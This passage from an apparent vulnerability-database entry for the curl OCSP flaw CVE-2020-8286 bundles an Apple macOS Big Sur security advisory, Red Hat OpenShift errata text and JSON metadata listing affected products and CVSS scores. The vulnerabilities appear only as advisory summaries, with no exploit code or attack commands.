Foundation Available for: macOS Big Sur Impact: A malicious application may be able to gain root privileges Description: A validation issue was addressed with improved logic. CVE-2021-1813: Cees Elzinga

Heimdal Available for: macOS Big Sur Impact: Processing maliciously crafted server messages may lead to heap corruption Description: This issue was addressed with improved checks. CVE-2021-1883: Gabe Kirkpatrick (@gabe_k)

Heimdal Available for: macOS Big Sur Impact: A remote attacker may be able to cause a denial of service Description: A race condition was addressed with improved locking. CVE-2021-1884: Gabe Kirkpatrick (@gabe_k)

ImageIO Available for: macOS Big Sur Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: This issue was addressed with improved checks. CVE-2021-1880: Xingwei Lin of Ant Security Light-Year Lab CVE-2021-30653: Ye Zhang of Baidu Security CVE-2021-1814: Ye Zhang of Baidu Security, Mickey Jin & Qi Sun of Trend Micro, and Xingwei Lin of Ant Security Light-Year Lab CVE-2021-1843: Ye Zhang of Baidu Security

ImageIO Available for: macOS Big Sur Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2021-1885: CFF of Topsec Alpha Team

ImageIO Available for: macOS Big Sur Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2021-1858: Mickey Jin of Trend Micro

Installer Available for: macOS Big Sur Impact: A malicious application may bypass Gatekeeper checks Description: This issue was addressed with improved handling of file metadata. CVE-2021-30658: Wojciech Reguła (@_r3ggi) of SecuRing

Intel Graphics Driver Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2021-1841: Jack Dates of RET2 Systems, Inc. CVE-2021-1834: ABC Research s.r.o. working with Trend Micro Zero Day Initiative

Kernel Available for: macOS Big Sur Impact: A malicious application may be able to disclose kernel memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2021-1860: @0xalsr

Kernel Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A memory corruption issue was addressed with improved validation. CVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab

Kernel Available for: macOS Big Sur Impact: An application may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved state management. CVE-2021-1851: @0xalsr

Kernel Available for: macOS Big Sur Impact: Copied files may not have the expected file permissions Description: The issue was addressed with improved permissions logic. CVE-2021-1832: an anonymous researcher

Kernel Available for: macOS Big Sur Impact: A malicious application may be able to disclose kernel memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2021-30660: Alex Plaskett

libxpc Available for: macOS Big Sur Impact: A malicious application may be able to gain root privileges Description: A race condition was addressed with additional validation. CVE-2021-30652: James Hutchins

libxslt Available for: macOS Big Sur Impact: Processing a maliciously crafted file may lead to heap corruption Description: A double free issue was addressed with improved memory management. CVE-2021-1875: Found by OSS-Fuzz

Login Window Available for: macOS Big Sur Impact: A malicious application with root privileges may be able to access private information Description: This issue was addressed with improved entitlements. CVE-2021-1824: Wojciech Reguła (@_r3ggi) of SecuRing

Notes Available for: macOS Big Sur Impact: Locked Notes content may have been unexpectedly unlocked Description: A logic issue was addressed with improved state management. CVE-2021-1859: Syed Ali Shuja (@SyedAliShuja) of Colour King Pvt. Ltd

NSRemoteView Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2021-1876: Matthew Denton of Google Chrome

Preferences Available for: macOS Big Sur Impact: A local user may be able to modify protected parts of the file system Description: A parsing issue in the handling of directory paths was addressed with improved path validation. CVE-2021-1815: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com) CVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com) CVE-2021-1740: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Safari Available for: macOS Big Sur Impact: A malicious website may be able to track users by setting state in a cache Description: An issue existed in determining cache occupancy. The issue was addressed through improved logic. CVE-2021-1861: Konstantinos Solomos of University of Illinois at Chicago

Safari Available for: macOS Big Sur Impact: A malicious website may be able to force unnecessary network connections to fetch its favicon Description: A logic issue was addressed with improved state management. CVE-2021-1855: Håvard Mikkelsen Ottestad of HASMAC AS

SampleAnalysis Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A logic issue was addressed with improved state management. CVE-2021-1868: Tim Michaud of Zoom Communications

smbx Available for: macOS Big Sur Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: An integer overflow was addressed with improved input validation. CVE-2021-1878: Aleksandar Nikolic of Cisco Talos (talosintelligence.com)

System Preferences Available for: macOS Big Sur Impact: A malicious application may bypass Gatekeeper checks Description: A logic issue was addressed with improved state management. CVE-2021-30657: an anonymous researcher

tcpdump Available for: macOS Big Sur Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2020-8037: an anonymous researcher

Time Machine Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: The issue was addressed with improved permissions logic. CVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications and Gary Nield of ECSC Group plc

WebKit Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: An input validation issue was addressed with improved input validation. CVE-2021-1825: Alex Camboe of Aon’s Cyber Solutions

WebKit Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2021-1817: an anonymous researcher

WebKit Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved restrictions. CVE-2021-1826: an anonymous researcher

WebKit Available for: macOS Big Sur Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2021-1820: an anonymous researcher

WebKit Storage Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A use after free issue was addressed with improved memory management. CVE-2021-30661: yangkang(@dnpushme) of 360 ATA

WebRTC Available for: macOS Big Sur Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: A use after free issue was addressed with improved memory management. CVE-2020-7463: Megan2013678

Wi-Fi Available for: macOS Big Sur Impact: An application may be able to cause unexpected system termination or write kernel memory Description: A memory corruption issue was addressed with improved validation. CVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab

Wi-Fi Available for: macOS Big Sur Impact: An application may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved state handling. CVE-2021-1829: Tielei Wang of Pangu Lab

Wi-Fi Available for: macOS Big Sur Impact: An application may be able to execute arbitrary code with system privileges Description: The issue was addressed with improved permissions logic. CVE-2021-30655: Gary Nield of ECSC Group plc and Tim Michaud(@TimGMichaud) of Zoom Video Communications and Wojciech Reguła (@_r3ggi) of SecuRing

Windows Server Available for: macOS Big Sur Impact: A malicious application may be able to unexpectedly leak a user's credentials from secure text fields Description: An API issue in Accessibility TCC permissions was addressed with improved state management. CVE-2021-1873: an anonymous researcher

Installation note:

This update may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAmCHO0UACgkQZcsbuWJ6 jjA/XA/7BDDpbLo0btLbUrps6ELmcqFZhpvhuekw8Yd3jVeJihLcJGJpY38ZCcne srCJHuXPzlk3ex0bVkKNRrB04xF0vCA4TEBsJ495754PAKWrxmlx0Ce8zg4h+ey/ cMTaUgfB1sgOFO8kJCKJurCjhyQ3Xj5c5xa8/zxlKoAgI36PmhZsCoXC6KD+5mqn QCRF0kE/y0QSfsq13j4grLGMXLS4pkAJRMWvDiEliYDTw3pOul7ZDOwxLEyucVTv fE60H7ff7jfPbDcQ4yEgEbla40+YZYwl9Sv4zxIU2OBPva6HLbA+PXxk4F1QX7eA ECrfycMSIbQKZ2phryENZCcrX5DN4M/VcGIHq4ujF2CXBJymSWV0O5k5K0GzZ0Ko T2Zr2LOOunvHGrYy0okholNYb0iMA09dvwuDdEGr+vhLZhq1BBbmThhNEnArl7mE /fx2bvaS3o8TxGuh7mbeFK9q5Tafxe5Qhwgz9pnAtqBC8z1NgQoetk9pKPNDIsNY t3/7Xcix+fs28YOjmxPTpntud0EGSjxXm4g0bDbsU922iV1Z3ncgOvd//IzPXniS v4IqR/gPbhg+c2CGoaezD91sE5onLuMmFCogkUyftGHnN0EueKMjI+3fmyG4l4d1 0C3to6hKJNmTm56RgxwfVVOeVnsPF490s9LUYzO4ZUbaQHIuDfo= =9+Ju -----END PGP SIGNATURE-----

Security Fix(es):

golang: crypto/tls: certificate of wrong type is causing TLS client to panic (CVE-2021-34558)
golang: net: lookup functions may return invalid host names (CVE-2021-33195)
golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty (CVE-2021-33197)
golang: match/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents (CVE-2021-33198)
golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a custom TokenReader (CVE-2021-27918)
golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header (CVE-2021-31525)
golang: archive/zip: malformed archive may cause panic or memory exhaustion (CVE-2021-33196)

It was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196 have been incorrectly mentioned as fixed in RHSA for Serverless client kn 1.16.0. This has been fixed (CVE-2021-3703). Bugs fixed (https://bugzilla.redhat.com/):

1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic 1983651 - Release of OpenShift Serverless Serving 1.17.0 1983654 - Release of OpenShift Serverless Eventing 1.17.0 1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names 1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty 1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents 1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "communications cloud native core policy",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "1.14.0"
      },
      {
        "_id": null,
        "model": "essbase",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "21.2"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.7"
      },
      {
        "_id": null,
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.3"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.7"
      },
      {
        "_id": null,
        "model": "sinec infrastructure network services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0.1.1"
      },
      {
        "_id": null,
        "model": "communications billing and revenue management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.0.0.3.0"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.14.6"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15"
      },
      {
        "_id": null,
        "model": "hci bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.14.6"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "libcurl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.74.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.58"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "simatic tim 1531 irc",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.2"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "libcurl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.41.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8286"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163209"
      },
      {
        "db": "PACKETSTORM",
        "id": "163257"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "163496"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      }
    ],
    "trust": 1.4
  },
  "cve": "CVE-2020-8286",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2020-8286",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.0,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-186411",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2020-8286",
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-8286",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-755",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-186411",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186411"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8286"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "curl 7.41.0 through 7.73.0 is vulnerable to an improper check for certificate revocation due to insufficient verification of the OCSP response. HAXX libcurl is an open source client-side URL transfer library developed by Haxx (HAXX) in Sweden. The product supports protocols such as FTP, SFTP, TFTP and HTTP. A security vulnerability exists in libcurl that could be exploited by an attacker to read or write data in a session by acting as a man-in-the-middle through low-level OCSP authentication on libcurl. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.0 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.3/html/release_notes/\n\nSecurity:\n\n* fastify-reply-from: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21321)\n\n* fastify-http-proxy: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21322)\n\n* nodejs-netmask: improper input validation of octal input data\n(CVE-2021-28918)\n\n* redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)\n\n* redis: Integer overflow via COPY command for large intsets\n(CVE-2021-29478)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing\n- -u- extension (CVE-2020-28851)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)\n\n* oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)\n\n* redis: integer overflow when configurable limit for maximum supported\nbulk input size is too big on 32-bit platforms (CVE-2021-21309)\n\n* nodejs-lodash: command injection via template (CVE-2021-23337)\n\n* nodejs-hosted-git-info: Regular Expression denial of service via\nshortcutMatch in fromUrl() (CVE-2021-23362)\n\n* browserslist: parsing of invalid queries could result in Regular\nExpression Denial of Service (ReDoS) (CVE-2021-23364)\n\n* nodejs-postcss: Regular expression denial of service during source map\nparsing (CVE-2021-23368)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile\ntemplates with strict:true option (CVE-2021-23369)\n\n* nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in\nlib/previous-map.js (CVE-2021-23382)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile\ntemplates with compat:true option (CVE-2021-23383)\n\n* openssl: integer overflow in CipherUpdate (CVE-2021-23840)\n\n* openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n(CVE-2021-23841)\n\n* nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n(CVE-2021-27292)\n\n* grafana: snapshot feature allow an unauthenticated remote attacker to\ntrigger a DoS via a remote API call (CVE-2021-27358)\n\n* nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)\n\n* nodejs-netmask: incorrectly parses an IP address that has octal integer\nwith invalid character (CVE-2021-29418)\n\n* ulikunitz/xz: Infinite loop in readUvarint allows for denial of service\n(CVE-2021-29482)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\n* html-parse-stringify: Regular Expression DoS (CVE-2021-23346)\n\n* openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)\n\nFor more details about the security issues, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npages listed in the References section. \n\nBugs:\n\n* RFE Make the source code for the endpoint-metrics-operator public (BZ#\n1913444)\n\n* cluster became offline after apiserver health check (BZ# 1942589)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension\n1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag\n1913444 - RFE Make the source code for the endpoint-metrics-operator public\n1921286 - CVE-2021-21272 oras: zip-slip vulnerability via oras-pull\n1927520 - RHACM 2.3.0 images\n1928937 - CVE-2021-23337 nodejs-lodash: command injection via template\n1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n1930294 - CVE-2021-23839 openssl: incorrect SSLv2 rollback protection\n1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1936427 - CVE-2021-3377 nodejs-ansi_up: XSS due to insufficient URL sanitization\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1940196 - View Resource YAML option shows 404 error when reviewing a Subscription for an application\n1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n1941024 - CVE-2021-27358 grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call\n1941675 - CVE-2021-23346 html-parse-stringify: Regular Expression DoS\n1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service\n1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service\n1942589 - cluster became offline after apiserver health check\n1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()\n1944822 - CVE-2021-29418 nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service\n1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option\n1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing\n1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js\n1954368 - CVE-2021-29482 ulikunitz/xz: Infinite loop in readUvarint allows for denial of service\n1955619 - CVE-2021-23364 browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS)\n1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1957410 - CVE-2021-29477 redis: Integer overflow via STRALGO LCS command\n1957414 - CVE-2021-29478 redis: Integer overflow via COPY command for large intsets\n1964461 - CVE-2021-33502 normalize-url: ReDoS for data URLs\n1966615 - CVE-2021-33623 nodejs-trim-newlines: ReDoS in .end() method\n1968122 - clusterdeployment fails because hiveadmission sc does not have correct permissions\n1972703 - Subctl fails to join cluster, since it cannot auto-generate a valid cluster id\n1983131 - Defragmenting an etcd member doesn\u0027t reduce the DB size (7.5GB) on a setup with ~1000 spoke clusters\n\n5. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nFor Red Hat OpenShift Logging 5.0, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-u\npgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: Red Hat OpenShift Container Storage 4.6.5 security and bug fix update\nAdvisory ID:       RHSA-2021:2479-01\nProduct:           Red Hat OpenShift Container Storage\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2479\nIssue date:        2021-06-17\nCVE Names:         CVE-2016-10228 CVE-2017-14502 CVE-2019-2708\n                   CVE-2019-3842 CVE-2019-9169 CVE-2019-13012\n                   CVE-2019-14866 CVE-2019-25013 CVE-2020-8231\n                   CVE-2020-8284 CVE-2020-8285 CVE-2020-8286\n                   CVE-2020-8927 CVE-2020-9948 CVE-2020-9951\n                   CVE-2020-9983 CVE-2020-13434 CVE-2020-13543\n                   CVE-2020-13584 CVE-2020-13776 CVE-2020-15358\n                   CVE-2020-24977 CVE-2020-25659 CVE-2020-25678\n                   CVE-2020-26116 CVE-2020-26137 CVE-2020-27618\n                   CVE-2020-27619 CVE-2020-27783 CVE-2020-28196\n                   CVE-2020-29361 CVE-2020-29362 CVE-2020-29363\n                   CVE-2020-36242 CVE-2021-3139 CVE-2021-3177\n                   CVE-2021-3326 CVE-2021-3449 CVE-2021-3450\n                   CVE-2021-3528 CVE-2021-20305 CVE-2021-23239\n                   CVE-2021-23240 CVE-2021-23336\n====================================================================\n1. Summary:\n\nUpdated images that fix one security issue and several bugs are now\navailable for Red Hat OpenShift Container Storage 4.6.5 on Red Hat\nEnterprise Linux 8 from Red Hat Container Registry. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Storage is software-defined storage integrated\nwith and optimized for the Red Hat OpenShift Container Platform. Red Hat\nOpenShift Container Storage is a highly scalable, production-grade\npersistent storage for stateful applications running in the Red Hat\nOpenShift Container Platform. In addition to persistent storage, Red Hat\nOpenShift Container Storage provisions a multicloud data management service\nwith an S3 compatible API. \n\nSecurity Fix(es):\n\n* NooBaa: noobaa-operator leaking RPC AuthToken into log files\n(CVE-2021-3528)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nBug Fix(es):\n\n* Currently, a newly restored PVC cannot be mounted if some of the\nOpenShift Container Platform nodes are running on a version of Red Hat\nEnterprise Linux which is less than 8.2, and the snapshot from which the\nPVC was restored is deleted. \nWorkaround: Do not delete the snapshot from which the PVC was restored\nuntil the restored PVC is deleted. (BZ#1962483)\n\n* Previously, the default backingstore was not created on AWS S3 when\nOpenShift Container Storage was deployed, due to incorrect identification\nof AWS S3. With this update, the default backingstore gets created when\nOpenShift Container Storage is deployed on AWS S3. (BZ#1927307)\n\n* Previously, log messages were printed to the endpoint pod log even if the\ndebug option was not set. With this update, the log messages are printed to\nthe endpoint pod log only when the debug option is set. (BZ#1938106)\n\n* Previously, the PVCs could not be provisioned as the `rook-ceph-mds` did\nnot register the pod IP on the monitor servers, and hence every mount on\nthe filesystem timed out, resulting in CephFS volume provisioning failure. \nWith this update, an argument `--public-addr=podIP` is added to the MDS pod\nwhen the host network is not enabled, and hence the CephFS volume\nprovisioning does not fail. (BZ#1949558)\n\n* Previously, OpenShift Container Storage 4.2 clusters were not updated\nwith the correct cache value, and hence MDSs in standby-replay might report\nan oversized cache, as rook did not apply the `mds_cache_memory_limit`\nargument during upgrades. With this update, the `mds_cache_memory_limit`\nargument is applied during upgrades and the mds daemon operates normally. \n(BZ#1951348)\n\n* Previously, the coredumps were not generated in the correct location as\nrook was setting the config option `log_file` to an empty string since\nlogging happened on stdout and not on the files, and hence Ceph read the\nvalue of the `log_file` to build the dump path. With this update, rook does\nnot set the `log_file` and keeps Ceph\u0027s internal default, and hence the\ncoredumps are generated in the correct location and are accessible under\n`/var/log/ceph/`. (BZ#1938049)\n\n* Previously, Ceph became inaccessible, as the mons lose quorum if a mon\npod was drained while another mon was failing over. With this update,\nvoluntary mon drains are prevented while a mon is failing over, and hence\nCeph does not become inaccessible. (BZ#1946573)\n\n* Previously, the mon quorum was at risk, as the operator could erroneously\nremove the new mon if the operator was restarted during a mon failover. \nWith this update, the operator completes the same mon failover after the\noperator is restarted, and hence the mon quorum is more reliable in the\nnode drains and mon failover scenarios. 